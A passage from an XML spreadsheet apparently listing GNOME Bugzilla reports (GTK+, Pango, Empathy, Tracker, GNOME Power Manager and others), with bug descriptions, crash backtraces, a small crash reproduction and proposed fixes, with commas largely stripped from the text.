    <t>pdf will not be opened by helper application</t>
  </si>
  <si>
    <t>I want pdf files to open with Adobe Reader.
In the list of MIME types I have the lines:
application/pdf  Run with helper app  /usr/local/Acrobat4/bin/acroread  True
application/x-pdf  Run with helper app  /usr/local/Acrobat4/bin/acroread  True
Also in Gnome acroread is set as the helper application of choice.
However whenever I click on a pdf file in Galeon I get a save-as dialog.</t>
  </si>
  <si>
    <t>GTK+-331820</t>
  </si>
  <si>
    <t>Small error in _gdk_gc_update_context</t>
  </si>
  <si>
    <t>The code reads:
  [...]
  if (fill == GDK_OPAQUE_STIPPLED)
    {
      if (override_foreground)
	foreground = *override_foreground
      else
	gc_get_background (gc 
    }
  [...]
    case GDK_OPAQUE_STIPPLED:
      tile_surface = make_stipple_tile_surface (cr stipple 
This means background is used unitialized if override_foreground is set
and fill is GDK_OPAQUE_STIPPLED.
I think the first code block shoule read:
  if (fill == GDK_OPAQUE_STIPPLED)
    {
      if (override_foreground)
	foreground = *override_foreground
      else
	gc_get_foreground (gc 
      gc_get_background (gc 
    }
Owen do you agree ?</t>
  </si>
  <si>
    <t>EMPATHY-626009</t>
  </si>
  <si>
    <t>[PATCH] Allow selection of persona to chat to</t>
  </si>
  <si>
    <t>This branch adds submenus to the Chat Audio Call and Video Call entries in the context menu of a contact with multiple Personas. The submenus list all the Personas in the Individual allowing selection of the one you'd like to chat with or call.
http://git.collabora.co.uk/?p=user/pwith/empathya=shortlogh=refs/heads/linking-ui-rebase5
It doesn't modify any of the other menu entries (such as Send File) since I'm not sure we want to clutter the menu. Ideas are welcome. As such the first commit probably isn't quite ready to apply.
The second commit in the branch changes the contact information dialogue to show information for all the Personas in an Individual. It remains the same for Individuals which only have one Persona and just adds extra instances of EmpathyContactWidget for extra Personas. This is ugly but I think it'll do until a proper EmpathyIndividualWidget is written (which I'm partially working on as part of the linking dialogue work). Again thoughts are welcome as to how this widget should look.</t>
  </si>
  <si>
    <t>RYGEL-596327</t>
  </si>
  <si>
    <t>RYGEL</t>
  </si>
  <si>
    <t>Enables some weird plugins by default</t>
  </si>
  <si>
    <t>It enables the GstLaunch and ZDF Mediathek plugins by default which I have no need for.</t>
  </si>
  <si>
    <t>PANGO-462137</t>
  </si>
  <si>
    <t>memory corruption in pango_default_break</t>
  </si>
  <si>
    <t>Steps to reproduce:
it happens with called with  empty text.
small test:
#include 
#include 
#include 
#include 
int main (int argc char **argv)
{
  PangoLogAttr *attrs = new PangoLogAttr[1]
  printf (before\n)  
  pango_get_log_attrs ( 0 -1 NULL attrs 1)
  printf (after\n)
  delete[] attrs
  return 0
}
originally that bug was spotted in inkscape - http://sourceforge.net/tracker/index.php?func=detail&amp;aid=1715838&amp;group_id=93438&amp;atid=604306
I will attach a patch which should solve that problem.
Stack trace:
Other information:</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-142630</t>
  </si>
  <si>
    <t>Quatorze documentation misspelling</t>
  </si>
  <si>
    <t>In the documentation for the soltaire game-type Quatorze the word five is
accidently misspelled as fibe and the phrase it's in probably needs dashes.
Fibe by five -&gt; Five-by-five</t>
  </si>
  <si>
    <t>HOTSSH-727225</t>
  </si>
  <si>
    <t>everything</t>
  </si>
  <si>
    <t>HOTSSH</t>
  </si>
  <si>
    <t>Tarball cannot be built</t>
  </si>
  <si>
    <t>Trying to build the tarball results in a build failure:
[    5s] + make -j1
[    5s] make: *** No rule to make target 'src/gssh-enum-types.h.template' needed by 'gssh-enum-types.h'.  Stop.
[    5s] error: Bad exit status from /var/tmp/rpm-tmp.XFBnc8 (%build)
There is no src/gssh-enum-types.h.template in either the tarball or in GIT
There does on the other hand exist the file ./gssh-enum-types.h which is what should be built dynamically.</t>
  </si>
  <si>
    <t>RHYTHMBOX-165769</t>
  </si>
  <si>
    <t>Column Resizing doesn't follow mouse</t>
  </si>
  <si>
    <t>When attempting to resize a single column in the current playlist panel the
column resizing does not react exactly as one would expect.  Dragging the right
side of one column to the right will grow the column but not by the amount that
the mouse is dragged.  It seems like for every 3-4 pixels the column is dragged
the border actually moves one pixel or so.  It is also frustrating that it
resizes all the columns when you adjust it - I just want to adjust one column at
a time to a certain width not play Whack-A-Mole.</t>
  </si>
  <si>
    <t>chrismurf</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-460812</t>
  </si>
  <si>
    <t>Game freezes when out of moves</t>
  </si>
  <si>
    <t>If you reach a level in the game where there are no safe places to teleport to the game freezes if you attempt a safe teleport.  I achieved this state at level 51 of Nightmare.  
I would suggest that whenever you start a level such that 25 * (fast robots) + 9 * (slow robots) &gt;= number of spaces on the map you should immediately scan space by space for valid safe teleport locations.  As soon as you find one proceed with the level as normal.  If you manage to scan every space without finding one then an attempt to make a safe teleport should beep at the user but otherwise do nothing.  
If the player has safe moves on his only options at this point will be to attempt an unsafe teleport (which will kill him) or to wait for the robots (which will also kill him).  If he has the safeties disabled he will of course have more options available: everything but safe teleport and all of them lethal.  Regardless the next move will end the game the only question remaining is how many more points the player will rack up with his final move.</t>
  </si>
  <si>
    <t>dataweaver</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-163100</t>
  </si>
  <si>
    <t>Categories should contain System and Settings</t>
  </si>
  <si>
    <t>Right now all the gnome-system-tools are in System tools. You'd think it
makes sense but in fact we're creating and administration menu (see bug
#161613). The patch there will be committed soon (before 2.9.4).
So it'd be better if the system tools were moved there. To do so you should
have the System and Settings categories set in the desktop files. e.g.:
Categories=ApplicationSystemSettings</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-382200</t>
  </si>
  <si>
    <t>add maintainer info for gnopernicus</t>
  </si>
  <si>
    <t>Maintainer info for gnopernicus:
developer[1] - Remus Draica</t>
  </si>
  <si>
    <t>EPIPHANY-134758</t>
  </si>
  <si>
    <t>Cannot compile with GCC 2.95</t>
  </si>
  <si>
    <t>The version should really be 1.1.8 but that was not an option in the list.
A compile error occurs when building with GCC 2.95 here is the output...
GlobalHistory.cpp:39: macro `NS_IMPL_ISUPPORTS2' used with too many (4) args
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp:39: warning: preprocessing directive not recognized
within macro arg
GlobalHistory.cpp: In method `nsresult
MozGlobalHistory::QueryInterface(const nsIID &amp; void **)':
GlobalHistory.cpp:34: undefined or invalid # directive
GlobalHistory.cpp:35: `nsIGlobalHistory2' undeclared (first use this function)
GlobalHistory.cpp:35: (Each undeclared identifier is reported only once
GlobalHistory.cpp:35: for each function it appears in.)
GlobalHistory.cpp:35: template argument 1 is invalid
GlobalHistory.cpp:35: parse error before `#'
GlobalHistory.cpp:36: undefined or invalid # directive
GlobalHistory.cpp:37: confused by earlier errors bailing out</t>
  </si>
  <si>
    <t>matt.lavin</t>
  </si>
  <si>
    <t>GLADE-412848</t>
  </si>
  <si>
    <t>GtkDialog's type-hint property has wrong value</t>
  </si>
  <si>
    <t>GtkWindow has a type-hint property that defaults to GDK_WINDOW_TYPE_HINT_NORMAL.
However GtkDialog's gtk_dialog_init instance-init function sets the type hint of the dialogue to GDK_WINDOW_TYPE_HINT_DIALOG.
Steps to reproduce:
0) Create a GtkDialog
1) Check the Type Hint property: it says NORMAL but the dialogue will in fact be DIALOG
And since NORMAL is the 'default' value (in the pspec sense) you cannot set NORMAL explicitly since it's not saved to the .glade file.</t>
  </si>
  <si>
    <t>JHBUILD-748086</t>
  </si>
  <si>
    <t>Create pacman systeminstall backend</t>
  </si>
  <si>
    <t>Created attachment 301879
Create pacman systeminstall backend
This implements `jhbuild sysdeps --install` for pacman.</t>
  </si>
  <si>
    <t>TRACKER-460659</t>
  </si>
  <si>
    <t>crash in Tracker Search Tool:</t>
  </si>
  <si>
    <t>Version: 0.6.0
What were you doing when the application crashed?
Distribution: Fedora release 7 (Moonshine)
Gnome Release: 2.18.3 2007-07-02 (Red Hat Inc)
BugBuddy Version: 2.18.0
System: Linux 2.6.22.1-27.fc7 #1 SMP Tue Jul 17 17:19:58 EDT 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: crystalsvg
Memory status: size: 290705408 vsize: 290705408 resident: 27287552 share: 23478272 rss: 27287552 rss_rlim: 18446744073709551615
CPU usage: start_time: 1185469451 rtime: 13 utime: 11 stime: 2 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/tracker-search-tool'
(no debugging symbols found)
Using host libthread_db library /lib64/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 46912500607216 (LWP 5391)]
(no debugging symbols found)
0x00000036ffc0d945 in waitpid () from /lib64/libpthread.so.0
#0  0x00000036ffc0d945 in waitpid () from /lib64/libpthread.so.0
#1  0x0000003b5a857c97 in g_str_hash () from /usr/lib64/libgnomeui-2.so.0
#2  
#3  0x000000370080fedd in g_ptr_array_foreach () from /lib64/libglib-2.0.so.0
#4  0x0000000000413a95 in ?? ()
#5  0x00002aaaaacdb710 in g_str_hash () from /usr/lib64/libtrackerclient.so.0
#6  0x00002aaaaacdcfc9 in g_str_hash () from /usr/lib64/libtrackerclient.so.0
#7  0x0000003708a0bdfa in g_str_hash () from /lib64/libdbus-1.so.3
#8  0x0000003708a0d4e1 in dbus_connection_dispatch ()
   from /lib64/libdbus-1.so.3
#9  0x000000370be09495 in g_str_hash () from /usr/lib64/libdbus-glib-1.so.2
#10 0x000000370082d1f4 in g_main_context_dispatch ()
   from /lib64/libglib-2.0.so.0
#11 0x000000370083002d in g_str_hash () from /lib64/libglib-2.0.so.0
#12 0x000000370083033a in g_main_loop_run () from /lib64/libglib-2.0.so.0
#13 0x0000003b59b2db13 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
#14 0x0000000000410ba8 in main ()
Thread 1 (Thread 46912500607216 (LWP 5391)):
#0  0x00000036ffc0d945 in waitpid () from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b5a857c97 in g_str_hash () from /usr/lib64/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x000000370080fedd in g_ptr_array_foreach () from /lib64/libglib-2.0.so.0
No symbol table info available.
#4  0x0000000000413a95 in ?? ()
No symbol table info available.
#5  0x00002aaaaacdb710 in g_str_hash () from /usr/lib64/libtrackerclient.so.0
No symbol table info available.
#6  0x00002aaaaacdcfc9 in g_str_hash () from /usr/lib64/libtrackerclient.so.0
No symbol table info available.
#7  0x0000003708a0bdfa in g_str_hash () from /lib64/libdbus-1.so.3
No symbol table info available.
#8  0x0000003708a0d4e1 in dbus_connection_dispatch ()
   from /lib64/libdbus-1.so.3
No symbol table info available.
#9  0x000000370be09495 in g_str_hash () from /usr/lib64/libdbus-glib-1.so.2
No symbol table info available.
#10 0x000000370082d1f4 in g_main_context_dispatch ()
   from /lib64/libglib-2.0.so.0
No symbol table info available.
#11 0x000000370083002d in g_str_hash () from /lib64/libglib-2.0.so.0
No symbol table info available.
#12 0x000000370083033a in g_main_loop_run () from /lib64/libglib-2.0.so.0
No symbol table info available.
#13 0x0000003b59b2db13 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x0000000000410ba8 in main ()
No symbol table info available.
#0  0x00000036ffc0d945 in waitpid () from /lib64/libpthread.so.0
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (26 sec old) ---------------------
Loading mirror speeds from cached hostfile
13:03:48 : Setup Yum : Package Sacks
13:03:48 : Setup Yum : Updates
13:03:50 : Setup Yum : Groups
Loading mirror speeds from cached hostfile
13:03:51 : Setup Yum : Base setup completed
13:03:51 : Building Package Lists
13:03:53 : Building Package Lists Completed
13:03:53 : Building Groups Lists
13:03:53 : Building Group Lists Completed
13:03:53 : Getting packages : updates
13:03:53 : Found 40 updates packages
13:03:53 : Sorting packages
13:03:53 : Population view with packages
13:03:53 : Population Completed
--------------------------------------------------</t>
  </si>
  <si>
    <t>maximeb</t>
  </si>
  <si>
    <t>GNOME-APPLETS-4155</t>
  </si>
  <si>
    <t>tasklist_applet crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Severity: normal
Version: 
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Raw Hide 19990706
System: Linux Highlander 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown
C library: glibc-2.1.1-7
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.53
gnome-core: gnome-core-1.0.53-2
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x404d84f9 in __wait4 () from /lib/libc.so.6
#0  0x404d84f9 in __wait4 () from /lib/libc.so.6
#1  0x405341b4 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4013ff01 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0xbffff954 in ?? ()
#4  0x804f317 in gwmh_task_notifier_remove_func ()
#5  0x804f445 in gwmh_task_notifier_remove_func ()
#6  0x804e44d in gwmh_root_put_atom_window ()
#7  0x804ebcf in gwmh_root_put_atom_window ()
#8  0x40091bd9 in g_idle_dispatch () from /usr/lib/libglib-1.2.so.0
#9  0x40090be6 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#10 0x400911a1 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#11 0x40091341 in g_main_run () from /usr/lib/libglib-1.2.so.0
#12 0x4027f859 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#13 0x40020315 in applet_widget_gtk_main () from /usr/lib/libpanel_applet.so.0
#14 0x804d3ac in main ()
#15 0x40461cb3 in __libc_start_main (main=0x804d320  argc=3 
    argv=0xbffffbd4 init=0x804b8d0  fini=0x80520cc  
    rtld_fini=0x4000a350  stack_end=0xbffffbcc)
    at ../sysdeps/generic/libc-start.c:78
#0  0x404d84f9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405341b4 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4013ff01 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0xbffff954 in ?? ()
No symbol table info available.
#4  0x804f317 in gwmh_task_notifier_remove_func ()
No symbol table info available.
#5  0x804f445 in gwmh_task_notifier_remove_func ()
No symbol table info available.
#6  0x804e44d in gwmh_root_put_atom_window ()
No symbol table info available.
#7  0x804ebcf in gwmh_root_put_atom_window ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:54 -------
This bug was previously known as bug 4155 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=4155
Originally filed under the gnome-applets product and general component.
The original reporter (jzaun@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>jzaun</t>
  </si>
  <si>
    <t>GNOME-COMMANDER-434501</t>
  </si>
  <si>
    <t>crash in GNOME Commander: Using tool multi-rename ...</t>
  </si>
  <si>
    <t>Version: 1.2.3
What were you doing when the application crashed?
Using tool multi-rename on about 30 repertories.
Distribution: Debian lenny/sid
Gnome Release: 2.18.1 2007-04-25 (Debian)
BugBuddy Version: 2.18.1
System: Linux 2.6.20-1-k7 #1 SMP Tue Apr 24 22:37:29 UTC 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: gnome
Memory status: size: 31870976 vsize: 31870976 resident: 18784256 share: 11321344 rss: 18784256 rss_rlim: 4294967295
CPU usage: start_time: 1177914057 rtime: 453 utime: 425 stime: 28 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gnome-commander'
(no debugging symbols found)
Using host libthread_db library /lib/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1224767808 (LWP 11186)]
(no debugging symbols found)
0xb7fbf822 in ?? () from /lib/ld-linux.so.2
#0  0xb7fbf822 in ?? () from /lib/ld-linux.so.2
#1  0xb799b5b3 in __waitpid_nocancel () from /lib/i686/cmov/libpthread.so.0
#2  0xb7f18865 in ?? () from /usr/lib/libgnomeui-2.so.0
#3  0x00002bb8 in ?? ()
#4  0xbffd3558 in ?? ()
#5  0x00000000 in ?? ()
Thread 1 (Thread -1224767808 (LWP 11186)):
#0  0xb7fbf822 in ?? () from /lib/ld-linux.so.2
No symbol table info available.
#1  0xb799b5b3 in __waitpid_nocancel () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7f18865 in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x00002bb8 in ?? ()
No symbol table info available.
#4  0xbffd3558 in ?? ()
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
#0  0xb7fbf822 in ?? () from /lib/ld-linux.so.2
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (122 sec old) ---------------------
** Message: volume = 0
** Message: drive = 0
** Message: volume = 0
** Message: drive = 0
** Message: volume = 0
** Message: drive = 0
** Message: volume = 0
** Message: drive = 0
** Message: volume = 0
** Message: drive = 0
** Message: volume = 0
** Message: drive = 0
** Message: volume = 0
(gnome-commander:11186): Gtk-WARNING **: Ignoring the separator setting
--------------------------------------------------</t>
  </si>
  <si>
    <t>jean.pal</t>
  </si>
  <si>
    <t>GTK+-58920</t>
  </si>
  <si>
    <t>can't undo gtk_menu_item_right_justify()</t>
  </si>
  <si>
    <t>gtk_menu_item_right_justify () sets right_justify field of GtkMenuItem
instance to TRUE. But it's impossible to set it back to FALSE.
I see two different ways of fixing that.
1. Quick fix.
Add a parameter to gtk_menu_item_right_justify () and rename it to
gtk_menu_item_set_right_justify ():
	void        gtk_menu_item_set_right_justify     (GtkMenuItem *menu_item
gboolean is_true)
Calling gtk_menu_item_right_justify (item FALSE) will lead to setting
right_justify to FALSE.
The getter 
gboolean gtk_menu_item_get_right_justify (GtkMenuItem*) 
will be also necessary.
2. Not a quick fix.
Remove gtk_menu_item_right_justify () and add
void gtk_menu_item_set_justification (GtkMenuItem* item
GtkMenuItemJustification justification).
GtkMenuItemJustification is a new standard enumeration:
enum GtkMenuItemJustification
 typedef enum
 {
   GTK_JUSTIFY_LEFT
   GTK_JUSTIFY_RIGHT
 } GtkMenuItemJustification
Used for justifying menu items.
 GTK_JUSTIFY_LEFT	The menu item is left-justified.
 GTK_JUSTIFY_RIGHT	The menu item is left-justified.
The getter
GtkMenuItemJustification gtk_menu_item_get_justification (GtkMenuItem*)
will be also necessary.
I like the second way more but it requires more time.</t>
  </si>
  <si>
    <t>GTKHTML-248615</t>
  </si>
  <si>
    <t>GtkHTML uses wrong selection color</t>
  </si>
  <si>
    <t>When I use Evolution on HEAD HTML selections appear in black on blue
instead of white on blue as in the other text widgets in GTK.</t>
  </si>
  <si>
    <t>GSTREAMER-734830</t>
  </si>
  <si>
    <t>GstGLMixer gl resource race condition</t>
  </si>
  <si>
    <t>Created attachment 283432
demo code to trigger the bug
while pipeline dynamic changed gst_gl_mixer_decide_allocation (runs on app main thread) will re-allocate fbo/depth_texture 
but gst_gl_mixer_process_textures(runs on GstAggregator's own main context thread) may still runs. leads invalid gl object access .
the demo code is modified dynamic change pipeline element  from gstreamer manual  this demo will trigger 
*: gint gst_gl_shader_get_attribute_location(GstGLShader * const gchar *): assertion 'priv-&gt;program_handle != 0' failed
or fbo !=0 assert while changing elements 
(the GstAggregator use buffer timestamp to decide which buffers to displayso it didn't fit dynamic element very well. only first a few element changes can be viewed)</t>
  </si>
  <si>
    <t>comicfans44</t>
  </si>
  <si>
    <t>GLIB-57694</t>
  </si>
  <si>
    <t>GIOChannel: need to resolve how to handle partial chars on flush</t>
  </si>
  <si>
    <t>We need to decide what to do with the contents of partial_chars_buf
in a GIOChannel on a call to g_io_channel_flush().</t>
  </si>
  <si>
    <t>rsteinke</t>
  </si>
  <si>
    <t>DIA-84603</t>
  </si>
  <si>
    <t>display wrong value in properties dialog of chronogram-reference</t>
  </si>
  <si>
    <t>how to duplicate:
1. new one A Time Scale shape from Chronogram sheet
2. double click the shape to open the properties dialog
3. in the right End time shows the default value 20 click the decrease
arrow to make it 19.9
4. close the properties dialog and reopen it
5. now End time shows 9.90. That's wrong! 
6. Clicking the decrease arrow will get it back to correct value 19.8 so
it's just out of sync.</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-444240</t>
  </si>
  <si>
    <t>crash in Power Manager: NOTHING! I WASNT DOING N...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
NOTHING! I WASNT DOING NOTHING WITH IT!!!!!!
Distribution: Fedora release 7.89 (Rawhide)
Gnome Release: 2.19.2 2007-05-19 (Red Hat Inc)
BugBuddy Version: 2.18.0
System: Linux 2.6.21-1.3200.fc8 #1 SMP Sat Jun 2 05:42:16 EDT 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: Fedora
Memory status: size: 61968384 vsize: 61968384 resident: 23785472 share: 21106688 rss: 23785472 rss_rlim: 4294967295
CPU usage: start_time: 1181008853 rtime: 92 utime: 70 stime: 22 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gnome-power-manager'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1208296848 (LWP 2442)]
(no debugging symbols found)
0x00bd8402 in __kernel_vsyscall ()
#0  0x00bd8402 in __kernel_vsyscall ()
#1  0x00832c33 in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x0404ba46 in ?? () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x00599aeb in g_logv () from /lib/libglib-2.0.so.0
#5  0x00599d69 in g_log () from /lib/libglib-2.0.so.0
#6  0x08072157 in gpm_array_float_get ()
#7  0x0805f34b in ?? ()
#8  0x0805fa86 in gpm_profile_register_percentage ()
#9  0x0805a2b5 in ?? ()
#10 0x00468d83 in g_cclosure_marshal_VOID () from /lib/libgobject-2.0.so.0
#11 0x0045add3 in g_closure_invoke () from /lib/libgobject-2.0.so.0
#12 0x0046c90d in ?? () from /lib/libgobject-2.0.so.0
#13 0x0046dd73 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
#14 0x0046e019 in g_signal_emit () from /lib/libgobject-2.0.so.0
#15 0x08056bdb in ?? ()
#16 0x080783bb in libhal_marshal_VOID__STRING_BOOLEAN_BOOLEAN_BOOLEAN ()
#17 0x0045add3 in g_closure_invoke () from /lib/libgobject-2.0.so.0
#18 0x0046c90d in ?? () from /lib/libgobject-2.0.so.0
#19 0x0046dd73 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
#20 0x0046e019 in g_signal_emit () from /lib/libgobject-2.0.so.0
#21 0x08075e93 in ?? ()
#22 0x0807872d in libhal_marshal_VOID__INT_BOXED ()
#23 0x00351946 in ?? () from /usr/lib/libdbus-glib-1.so.2
#24 0x0045add3 in g_closure_invoke () from /lib/libgobject-2.0.so.0
#25 0x0046c90d in ?? () from /lib/libgobject-2.0.so.0
#26 0x0046dd73 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
#27 0x0046e019 in g_signal_emit () from /lib/libgobject-2.0.so.0
#28 0x0035280b in ?? () from /usr/lib/libdbus-glib-1.so.2
#29 0x05ecf9c2 in dbus_connection_dispatch () from /lib/libdbus-1.so.3
#30 0x0034ae1d in ?? () from /usr/lib/libdbus-glib-1.so.2
#31 0x00590f9c in g_main_context_dispatch () from /lib/libglib-2.0.so.0
#32 0x0059435f in ?? () from /lib/libglib-2.0.so.0
#33 0x00594709 in g_main_loop_run () from /lib/libglib-2.0.so.0
#34 0x0806623d in main ()
Thread 1 (Thread -1208296848 (LWP 2442)):
#0  0x00bd8402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00832c33 in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x0404ba46 in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x00599aeb in g_logv () from /lib/libglib-2.0.so.0
No symbol table info available.
#5  0x00599d69 in g_log () from /lib/libglib-2.0.so.0
No symbol table info available.
#6  0x08072157 in gpm_array_float_get ()
No symbol table info available.
#7  0x0805f34b in ?? ()
No symbol table info available.
#8  0x0805fa86 in gpm_profile_register_percentage ()
No symbol table info available.
#9  0x0805a2b5 in ?? ()
No symbol table info available.
#10 0x00468d83 in g_cclosure_marshal_VOID () from /lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x0045add3 in g_closure_invoke () from /lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x0046c90d in ?? () from /lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x0046dd73 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x0046e019 in g_signal_emit () from /lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x08056bdb in ?? ()
No symbol table info available.
#16 0x080783bb in libhal_marshal_VOID__STRING_BOOLEAN_BOOLEAN_BOOLEAN ()
No symbol table info available.
#17 0x0045add3 in g_closure_invoke () from /lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x0046c90d in ?? () from /lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x0046dd73 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x0046e019 in g_signal_emit () from /lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x08075e93 in ?? ()
No symbol table info available.
#22 0x0807872d in libhal_marshal_VOID__INT_BOXED ()
No symbol table info available.
#23 0x00351946 in ?? () from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#24 0x0045add3 in g_closure_invoke () from /lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x0046c90d in ?? () from /lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x0046dd73 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x0046e019 in g_signal_emit () from /lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x0035280b in ?? () from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#29 0x05ecf9c2 in dbus_connection_dispatch () from /lib/libdbus-1.so.3
No symbol table info available.
#30 0x0034ae1d in ?? () from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#31 0x00590f9c in g_main_context_dispatch () from /lib/libglib-2.0.so.0
No symbol table info available.
#32 0x0059435f in ?? () from /lib/libglib-2.0.so.0
No symbol table info available.
#33 0x00594709 in g_main_loop_run () from /lib/libglib-2.0.so.0
No symbol table info available.
#34 0x0806623d in main ()
No symbol table info available.
#0  0x00bd8402 in __kernel_vsyscall ()
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
Output of custom script gnome-power-bugreport.sh:
Distro version:       Fedora release 7.89 (Rawhide)
Kernel version:       2.6.21-1.3200.fc8
HAL version:          0.5.9
System manufacturer:  TOSHIBA
System version:       PSAA1U-003002
System product:       Satellite A100
AC adapter present:   yes
Battery present:      yes
Laptop panel present: yes
CPU scaling present:  yes
Battery Information:
  battery.charge_level.capacity_state = 'ok'  (string)
  battery.charge_level.current = 39645  (0x9add)  (int)
  battery.charge_level.design = 39645  (0x9add)  (int)
  battery.charge_level.granularity_1 = 0  (0x0)  (int)
  battery.charge_level.granularity_2 = 39645  (0x9add)  (int)
  battery.charge_level.last_full = 39645  (0x9add)  (int)
  battery.charge_level.low = 0  (0x0)  (int)
  battery.charge_level.percentage = 100  (0x64)  (int)
  battery.charge_level.rate = 38070  (0x94b6)  (int)
  battery.charge_level.unit = 'mWh'  (string)
  battery.charge_level.warning = 0  (0x0)  (int)
  battery.is_rechargeable = true  (bool)
  battery.model = 'PA3465U-1BAS/BRS'  (string)
  battery.present = true  (bool)
  battery.rechargeable.is_charging = false  (bool)
  battery.rechargeable.is_discharging = true  (bool)
  battery.remaining_time = 3748  (0xea4)  (int)
  battery.reporting.current = 2811  (0xafb)  (int)
  battery.reporting.design = 2643  (0xa53)  (int)
  battery.reporting.granularity_1 = 0  (0x0)  (int)
  battery.reporting.granularity_2 = 2643  (0xa53)  (int)
  battery.reporting.last_full = 2643  (0xa53)  (int)
  battery.reporting.low = 0  (0x0)  (int)
  battery.reporting.rate = 2538  (0x9ea)  (int)
  battery.reporting.technology = 'Li-I'  (string)
  battery.reporting.unit = 'mAh'  (string)
